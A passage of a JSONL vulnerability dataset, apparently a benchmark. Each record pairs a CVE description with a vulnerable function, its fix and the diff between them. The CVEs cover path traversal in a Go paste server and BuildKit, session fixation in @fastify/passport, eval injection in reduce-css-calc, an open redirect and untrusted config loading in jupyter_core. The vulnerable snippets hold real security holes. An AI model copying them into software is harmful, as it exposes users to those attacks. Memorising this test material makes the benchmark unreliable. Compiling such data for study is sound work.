html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/ansi\") {\n\t\t// check if they want ansi colored text\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/ansi\")\n\t\t// try to syntax highlight the file\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn fmt.Sprintf(\"%s
%s
%s\", htmlBegin, terminal.Render(data), htmlEnd), nil\n\t\t}\n\t} else {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\thighlighted, err := syntaxhighlight.AsHTML(data)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\treturn fmt.Sprintf(\"%s
%s
%s\", htmlBegin, string(highlighted), htmlEnd), nil\n\t\t}\n\t}\n\n\t// check if the file exists\n\tif _, err := os.Stat(filename); os.IsNotExist(err) {\n\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", filename))\n\t\treturn\n\t}\n\n\t// read the file\n\tsrc, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Reading file %s failed: %v\", filename, err))\n\t\treturn\n\t}\n\n\tdata, err := handler(src)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Processing file %s failed: %v\", filename, err))\n\t}\n\n\tio.WriteString(w, data)\n\treturn\n}"}], "fix_func": [{"id": "fix_go_264_1", "commit": "1af2facb6d95976c532b7f8f82747d454a092272", "file_path": "server.go", "start_line": 152, "end_line": 235, "snippet": "func (cmd *serverCommand) pasteHandler(w http.ResponseWriter, r *http.Request) {\n\tif r.URL.Path == \"/\" {\n\t\t// they want the root, make them auth\n\t\tu, p, ok := r.BasicAuth()\n\t\tif (u != username || p != password) || !ok {\n\t\t\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"`+baseuri+`\"`)\n\t\t\tw.WriteHeader(401)\n\t\t\tw.Write([]byte(\"401 Unauthorized\\n\"))\n\t\t\treturn\n\t\t}\n\n\t\thtml, err := cmd.generateIndexHTML()\n\t\tif err != nil {\n\t\t\twriteError(w, fmt.Sprintf(\"generating index html failed: %v\", err))\n\t\t\treturn\n\t\t}\n\n\t\t// write the html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfmt.Fprint(w, html)\n\t\tlogrus.Info(\"index file rendered\")\n\t\treturn\n\t}\n\n\tfilename := filepath.Join(cmd.storage, filepath.FromSlash(path.Clean(\"/\"+strings.Trim(r.URL.Path, \"/\"))))\n\n\tvar handler func(data []byte) (string, error)\n\n\tif strings.HasSuffix(filename, \"/raw\") {\n\t\t// if they want the raw file serve a text/plain Content-Type\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t// trim '/raw' from the filename so we can get the right file\n\t\tfilename = strings.TrimSuffix(filename, \"/raw\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/html\") {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/ansi\") {\n\t\t// check if they want ansi colored text\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/ansi\")\n\t\t// try to syntax highlight the file\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn fmt.Sprintf(\"%s
%s
%s\", htmlBegin, terminal.Render(data), htmlEnd), nil\n\t\t}\n\t} else {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\thighlighted, err := syntaxhighlight.AsHTML(data)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\treturn fmt.Sprintf(\"%s
%s
%s\", htmlBegin, string(highlighted), htmlEnd), nil\n\t\t}\n\t}\n\n\t// check if the file exists\n\tif _, err := os.Stat(filename); os.IsNotExist(err) {\n\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", r.URL.Path))\n\t\treturn\n\t}\n\n\t// read the file\n\tsrc, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Reading file %s failed: %v\", filename, err))\n\t\treturn\n\t}\n\n\tdata, err := handler(src)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Processing file %s failed: %v\", filename, err))\n\t}\n\n\tio.WriteString(w, data)\n\treturn\n}"}], "vul_patch": "--- a/server.go\n+++ b/server.go\n@@ -22,7 +22,7 @@\n \t\treturn\n \t}\n \n-\tfilename := filepath.Join(cmd.storage, strings.Trim(r.URL.Path, \"/\"))\n+\tfilename := filepath.Join(cmd.storage, filepath.FromSlash(path.Clean(\"/\"+strings.Trim(r.URL.Path, \"/\"))))\n \n \tvar handler func(data []byte) (string, error)\n \n@@ -63,7 +63,7 @@\n \n \t// check if the file exists\n \tif _, err := os.Stat(filename); os.IsNotExist(err) {\n-\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", filename))\n+\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", r.URL.Path))\n \t\treturn\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-29019", "cve_description": "@fastify/passport is a port of passport authentication library for the Fastify ecosystem. Applications using `@fastify/passport` in affected versions for user authentication, in combination with `@fastify/session` as the underlying session management mechanism, are vulnerable to session fixation attacks from network and same-site attackers. fastify applications rely on the `@fastify/passport` library for user authentication. The login and user validation are performed by the `authenticate` function. When executing this function, the `sessionId` is preserved between the pre-login and the authenticated session. Network and same-site attackers can hijack the victim's session by tossing a valid `sessionId` cookie in the victim's browser and waiting for the victim to log in on the website. As a solution, newer versions of `@fastify/passport` regenerate `sessionId` upon login, preventing the attacker-controlled pre-session cookie from being upgraded to an authenticated session. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n", "cwe_info": {"CWE-384": {"name": "Session Fixation", "description": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions."}}, "repo": "https://github.com/fastify/fastify-passport", "patch_url": ["https://github.com/fastify/fastify-passport/commit/43c82c321db58ea3e375dd475de60befbfcf2a11"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_286_1", "commit": "121afaefc8601d3ffcf1b327aff3661ae9acce63", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 25, "end_line": 28, "snippet": " async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n request.session.set(this.key, object)\n }"}, {"id": "vul_js_286_2", "commit": "121afaefc8601d3ffcf1b327aff3661ae9acce63", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 30, "end_line": 32, "snippet": " async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n }"}], "fix_func": [{"id": "fix_js_286_1", "commit": "43c82c321db58ea3e375dd475de60befbfcf2a11", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 25, "end_line": 33, "snippet": " async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n // Handle sessions using @fastify/session\n if (request.session.regenerate) {\n // regenerate session to guard against session fixation\n await request.session.regenerate()\n }\n request.session.set(this.key, object)\n }"}, {"id": "fix_js_286_2", "commit": "43c82c321db58ea3e375dd475de60befbfcf2a11", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 35, "end_line": 40, "snippet": " async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n if (request.session.regenerate) {\n await request.session.regenerate()\n }\n }"}], "vul_patch": "--- a/src/session-managers/SecureSessionManager.ts\n+++ b/src/session-managers/SecureSessionManager.ts\n@@ -1,4 +1,9 @@\n async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n+ // Handle sessions using @fastify/session\n+ if (request.session.regenerate) {\n+ // regenerate session to guard against session fixation\n+ await request.session.regenerate()\n+ }\n request.session.set(this.key, object)\n }\n\n--- a/src/session-managers/SecureSessionManager.ts\n+++ b/src/session-managers/SecureSessionManager.ts\n@@ -1,3 +1,6 @@\n async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n+ if (request.session.regenerate) {\n+ await request.session.regenerate()\n+ }\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10548", "cve_description": "Arbitrary code execution is possible in reduce-css-calc node module <=1.2.4 through crafted css. This makes cross sites scripting (XSS) possible on the client and arbitrary code injection possible on the server and user input is passed to the `calc` function.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/MoOx/reduce-css-calc", "patch_url": ["https://github.com/MoOx/reduce-css-calc/commit/aebe8f7adce937c0fec4c1315e4113ef74cadb6a"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_26_1", "commit": "da7bce7d90af3ebde50295f291fa445c7b56460e", "file_path": "index.js", "start_line": 40, "end_line": 96, "snippet": " function evaluateExpression (expression, functionIdentifier, call) {\n if (stack++ > MAX_STACK) {\n stack = 0\n throw new Error(\"Call stack overflow for \" + call)\n }\n\n if (expression === \"\") {\n throw new Error(functionIdentifier + \"(): '\" + call + \"' must contain a non-whitespace string\")\n }\n\n expression = evaluateNestedExpression(expression, call)\n\n var units = getUnitsInExpression(expression)\n\n // If the expression contains multiple units or CSS variables,\n // then let the expression be (i.e. browser calc())\n if (units.length > 1 || expression.indexOf(\"var(\") > -1) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n var unit = units[0] || \"\"\n\n if (unit === \"%\") {\n // Convert percentages to numbers, to handle expressions like: 50% * 50% (will become: 25%):\n // console.log(expression)\n expression = expression.replace(/\\b[0-9\\.]+%/g, function(percent) {\n return parseFloat(percent.slice(0, -1)) * 0.01\n })\n }\n\n // Remove units in expression:\n var toEvaluate = expression.replace(new RegExp(unit, \"gi\"), \"\")\n var result\n\n try {\n result = eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n // Transform back to a percentage result:\n if (unit === \"%\") {\n result *= 100\n }\n\n // adjust rounding shit\n // (0.1 * 0.2 === 0.020000000000000004)\n if (functionIdentifier.length || unit === \"%\") {\n result = Math.round(result * decimalPrecision) / decimalPrecision\n }\n\n // Add unit\n result += unit\n\n return result\n }"}], "fix_func": [{"id": "fix_js_26_1", "commit": "aebe8f7adce937c0fec4c1315e4113ef74cadb6a", "file_path": "index.js", "start_line": 45, "end_line": 101, "snippet": " function evaluateExpression (expression, functionIdentifier, call) {\n if (stack++ > MAX_STACK) {\n stack = 0\n throw new Error(\"Call stack overflow for \" + call)\n }\n\n if (expression === \"\") {\n throw new Error(functionIdentifier + \"(): '\" + call + \"' must contain a non-whitespace string\")\n }\n\n expression = evaluateNestedExpression(expression, call)\n\n var units = getUnitsInExpression(expression)\n\n // If the expression contains multiple units or CSS variables,\n // then let the expression be (i.e. browser calc())\n if (units.length > 1 || expression.indexOf(\"var(\") > -1) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n var unit = units[0] || \"\"\n\n if (unit === \"%\") {\n // Convert percentages to numbers, to handle expressions like: 50% * 50% (will become: 25%):\n // console.log(expression)\n expression = expression.replace(/\\b[0-9\\.]+%/g, function(percent) {\n return parseFloat(percent.slice(0, -1)) * 0.01\n })\n }\n\n // Remove units in expression:\n var toEvaluate = expression.replace(new RegExp(unit, \"gi\"), \"\")\n var result\n\n try {\n result = mexp.eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n // Transform back to a percentage result:\n if (unit === \"%\") {\n result *= 100\n }\n\n // adjust rounding shit\n // (0.1 * 0.2 === 0.020000000000000004)\n if (functionIdentifier.length || unit === \"%\") {\n result = Math.round(result * decimalPrecision) / decimalPrecision\n }\n\n // Add unit\n result += unit\n\n return result\n }"}, {"id": "fix_js_26_2", "commit": "aebe8f7adce937c0fec4c1315e4113ef74cadb6a", "file_path": "index.js", "start_line": 35, "end_line": 37, "snippet": " // CSS allow to omit 0 for 0.* values,\n // but math-expression-evaluator does not\n value = value.replace(/\\s(\\.[0-9])/g, \" 0$1\")"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -33,7 +33,7 @@\n var result\n \n try {\n- result = eval(toEvaluate)\n+ result = mexp.eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,3 @@\n+ // CSS allow to omit 0 for 0.* values,\n+ // but math-expression-evaluator does not\n+ value = value.replace(/\\s(\\.[0-9])/g, \" 0$1\")\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2016-10548:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/reduce-css-calc\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest --forceExit ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2016-10548:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/reduce-css-calc\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test\n"} {"cve_id": "CVE-2024-23652", "cve_description": "BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/moby/buildkit", "patch_url": ["https://github.com/moby/buildkit/commit/23bebc4a180b84ba18733f545e7559e10c439ac3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_163_1", "commit": "6b2dfbc", "file_path": "executor/stubs.go", "start_line": 15, "end_line": 96, "snippet": "func MountStubsCleaner(ctx context.Context, dir string, mounts []Mount, recursive bool) func() {\n\tnames := []string{\"/etc/resolv.conf\", \"/etc/hosts\"}\n\n\tfor _, m := range mounts {\n\t\tnames = append(names, m.Dest)\n\t}\n\n\tpaths := make([]string, 0, len(names))\n\n\tfor _, p := range names {\n\t\tp = filepath.Join(\"/\", p)\n\t\tif p == \"/\" {\n\t\t\tcontinue\n\t\t}\n\t\trealPath, err := fs.RootPath(dir, p)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tfor {\n\t\t\t_, err = os.Lstat(realPath)\n\t\t\tif !(errors.Is(err, os.ErrNotExist) || errors.Is(err, syscall.ENOTDIR)) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tpaths = append(paths, realPath)\n\n\t\t\tif !recursive {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\trealPathNext := filepath.Dir(realPath)\n\t\t\tif realPath == realPathNext {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\trealPath = realPathNext\n\t\t}\n\t}\n\n\treturn func() {\n\t\tfor _, p := range paths {\n\t\t\tst, err := os.Lstat(p)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif st.IsDir() {\n\t\t\t\tentries, err := os.ReadDir(p)\n\t\t\t\tif err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t} else if st.Size() != 0 {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Back up the timestamps of the dir for reproducible builds\n\t\t\t// https://github.com/moby/buildkit/issues/3148\n\t\t\tdir := filepath.Dir(p)\n\t\t\tdirSt, err := os.Stat(dir)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmtime := dirSt.ModTime()\n\t\t\tatime, err := system.Atime(dirSt)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat atime of %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tatime = mtime\n\t\t\t}\n\n\t\t\tif err := os.Remove(p); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to remove mount stub %q\", p)\n\t\t\t}\n\n\t\t\t// Restore the timestamps of the dir\n\t\t\tif err := os.Chtimes(dir, atime, mtime); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n\t\t\t}\n\t\t}\n\t}\n}"}], "fix_func": [{"id": "fix_go_163_1", "commit": "23bebc4", "file_path": "executor/stubs.go", "start_line": 16, "end_line": 106, "snippet": "func MountStubsCleaner(ctx context.Context, dir string, mounts []Mount, recursive bool) func() {\n\tnames := []string{\"/etc/resolv.conf\", \"/etc/hosts\"}\n\n\tfor _, m := range mounts {\n\t\tnames = append(names, m.Dest)\n\t}\n\n\tpaths := make([]string, 0, len(names))\n\n\tfor _, p := range names {\n\t\tp = filepath.Join(\"/\", p)\n\t\tif p == \"/\" {\n\t\t\tcontinue\n\t\t}\n\t\trealPath, err := fs.RootPath(dir, p)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tfor {\n\t\t\t_, err = os.Lstat(realPath)\n\t\t\tif !(errors.Is(err, os.ErrNotExist) || errors.Is(err, syscall.ENOTDIR)) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tpaths = append(paths, realPath)\n\n\t\t\tif !recursive {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\trealPathNext := filepath.Dir(realPath)\n\t\t\tif realPath == realPathNext || realPathNext == dir {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\trealPath = realPathNext\n\t\t}\n\t}\n\n\treturn func() {\n\t\tfor _, p := range paths {\n\t\t\tp, err := fs.RootPath(dir, strings.TrimPrefix(p, dir))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tst, err := os.Lstat(p)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif st.IsDir() {\n\t\t\t\tentries, err := os.ReadDir(p)\n\t\t\t\tif err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t} else if st.Size() != 0 {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Back up the timestamps of the dir for reproducible builds\n\t\t\t// https://github.com/moby/buildkit/issues/3148\n\t\t\tparent := filepath.Dir(p)\n\t\t\tif realPath, err := fs.RootPath(dir, strings.TrimPrefix(parent, dir)); err != nil || realPath != parent {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tdirSt, err := os.Stat(parent)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmtime := dirSt.ModTime()\n\t\t\tatime, err := system.Atime(dirSt)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat atime of %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tatime = mtime\n\t\t\t}\n\n\t\t\tif err := os.Remove(p); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to remove mount stub %q\", p)\n\t\t\t}\n\n\t\t\t// Restore the timestamps of the dir\n\t\t\tif err := os.Chtimes(parent, atime, mtime); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n\t\t\t}\n\t\t}\n\t}\n}"}], "vul_patch": "--- a/executor/stubs.go\n+++ b/executor/stubs.go\n@@ -29,7 +29,7 @@\n \t\t\t}\n \n \t\t\trealPathNext := filepath.Dir(realPath)\n-\t\t\tif realPath == realPathNext {\n+\t\t\tif realPath == realPathNext || realPathNext == dir {\n \t\t\t\tbreak\n \t\t\t}\n \t\t\trealPath = realPathNext\n@@ -38,6 +38,11 @@\n \n \treturn func() {\n \t\tfor _, p := range paths {\n+\t\t\tp, err := fs.RootPath(dir, strings.TrimPrefix(p, dir))\n+\t\t\tif err != nil {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\n \t\t\tst, err := os.Lstat(p)\n \t\t\tif err != nil {\n \t\t\t\tcontinue\n@@ -56,8 +61,12 @@\n \n \t\t\t// Back up the timestamps of the dir for reproducible builds\n \t\t\t// https://github.com/moby/buildkit/issues/3148\n-\t\t\tdir := filepath.Dir(p)\n-\t\t\tdirSt, err := os.Stat(dir)\n+\t\t\tparent := filepath.Dir(p)\n+\t\t\tif realPath, err := fs.RootPath(dir, strings.TrimPrefix(parent, dir)); err != nil || realPath != parent {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\n+\t\t\tdirSt, err := os.Stat(parent)\n \t\t\tif err != nil {\n \t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n \t\t\t\tcontinue\n@@ -74,7 +83,7 @@\n \t\t\t}\n \n \t\t\t// Restore the timestamps of the dir\n-\t\t\tif err := os.Chtimes(dir, atime, mtime); err != nil {\n+\t\t\tif err := os.Chtimes(parent, atime, mtime); err != nil {\n \t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n \t\t\t}\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23384", "cve_description": "The package koa-remove-trailing-slashes before 2.0.2 are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::removeTrailingSlashes(), as the web server uses relative URLs instead of absolute URLs.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/vgno/koa-remove-trailing-slashes", "patch_url": ["https://github.com/vgno/koa-remove-trailing-slashes/commit/e7ce4000e9fe4d957332df1056640a22ebea28ee"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_3_1", "commit": "b7da362", "file_path": "index.js", "start_line": 5, "end_line": 52, "snippet": "function removeTrailingSlashes(opts) {\n opts = opts || {};\n\n if (opts.defer !== false) {\n opts.defer = opts.defer || true;\n }\n\n if (opts.chained !== false) {\n opts.chained = opts.chained || true;\n }\n\n return async function(ctx, next) {\n if (opts.defer) {\n await next();\n }\n\n let path;\n let querystring = '';\n\n // We have already done a redirect and we will continue if we are in chained mode\n if (opts.chained && ctx.status === 301) {\n const location = ctx.response.get('Location') || '';\n\n // We can't use ctx.querystring because it may not be up to date\n const parsedLocation = location.match(/\\?(.*)$/);\n if (parsedLocation && parsedLocation[1]) {\n querystring = parsedLocation[1];\n }\n\n path = getPath(location, querystring);\n } else if (ctx.status !== 301) {\n querystring = ctx.querystring;\n path = getPath(ctx.originalUrl, ctx.querystring);\n }\n\n if (path && haveSlash(path)) {\n path = path.slice(0, -1);\n const query = querystring.length ? '?' + querystring : '';\n\n ctx.status = 301;\n ctx.redirect(path + query);\n }\n\n if (!opts.defer) {\n await next();\n }\n };\n}"}], "fix_func": [{"id": "fix_js_3_1", "commit": "e7ce400", "file_path": "index.js", "start_line": 5, "end_line": 56, "snippet": "function removeTrailingSlashes(opts) {\n opts = opts || {};\n\n if (opts.defer !== false) {\n opts.defer = opts.defer || true;\n }\n\n if (opts.chained !== false) {\n opts.chained = opts.chained || true;\n }\n\n return async function(ctx, next) {\n if (opts.defer) {\n await next();\n }\n\n let path;\n let querystring = '';\n\n // We have already done a redirect and we will continue if we are in chained mode\n if (opts.chained && ctx.status === 301) {\n const location = ctx.response.get('Location') || '';\n\n // We can't use ctx.querystring because it may not be up to date\n const parsedLocation = location.match(/\\?(.*)$/);\n if (parsedLocation && parsedLocation[1]) {\n querystring = parsedLocation[1];\n }\n\n path = getPath(location, querystring);\n } else if (ctx.status !== 301) {\n querystring = ctx.querystring;\n path = getPath(ctx.originalUrl, ctx.querystring);\n }\n\n if (path && haveSlash(path)) {\n path = path.slice(0, -1);\n const query = querystring.length ? '?' + querystring : '';\n\n const newURL = new URL(path + query, ctx.request.URL);\n\n if (ctx.origin === newURL.origin) {\n ctx.status = 301;\n ctx.redirect(path + query);\n }\n }\n\n if (!opts.defer) {\n await next();\n }\n };\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -37,8 +37,12 @@\n path = path.slice(0, -1);\n const query = querystring.length ? '?' + querystring : '';\n \n- ctx.status = 301;\n- ctx.redirect(path + query);\n+ const newURL = new URL(path + query, ctx.request.URL);\n+\n+ if (ctx.origin === newURL.origin) {\n+ ctx.status = 301;\n+ ctx.redirect(path + query);\n+ }\n }\n \n if (!opts.defer) {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23384:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/koa-remove-trailing-slashes\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpm test\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23384:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/koa-remove-trailing-slashes\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha --grep \"should work in a normal scenarion|should not redirect on url that already have been modified|should not redirect on url that is the root|should not redirect on url and url has no trailing slash|should not redirect on url with query and path has no trailing slash\""} {"cve_id": "CVE-2022-39286", "cve_description": "Jupyter Core is a package for the core common functionality of Jupyter projects. Jupyter Core prior to version 4.11.2 contains an arbitrary code execution vulnerability in `jupyter_core` that stems from `jupyter_core` executing untrusted files in CWD. This vulnerability allows one user to run code as another. Version 4.11.2 contains a patch for this issue. There are no known workarounds.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/jupyter/jupyter_core", "patch_url": ["https://github.com/jupyter/jupyter_core/commit/1118c8ce01800cb689d51f655f5ccef19516e283"], "programing_language": "Python", "vul_func": [{"id": "vul_py_45_1", "commit": "d3f61f3", "file_path": "jupyter_core/application.py", "start_line": 88, "end_line": 93, "snippet": " def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n path.insert(0, self.config_dir)\n path.insert(0, os.getcwd())\n return path"}], "fix_func": [{"id": "fix_py_45_1", "commit": "1118c8ce01800cb689d51f655f5ccef19516e283", "file_path": "jupyter_core/application.py", "start_line": 88, "end_line": 93, "snippet": " def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n # Insert config dir as first item.\n path.insert(0, self.config_dir)\n return path"}], "vul_patch": "--- a/jupyter_core/application.py\n+++ b/jupyter_core/application.py\n@@ -1,6 +1,6 @@\n def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n+ # Insert config dir as first item.\n path.insert(0, self.config_dir)\n- path.insert(0, os.getcwd())\n return path\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-39286:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/jupyter_core\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-39286/bin/python -m pytest jupyter_core/tests/test_application.py::test_load_config jupyter_core/tests/test_application.py::test_load_config_no_cwd jupyter_core/tests/test_application.py::test_load_bad_config -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-39286:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/jupyter_core\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-39286/bin/python -m pytest jupyter_core/tests/test_application.py -k \"not test_load_config\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2020-17526", "cve_description": "Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an 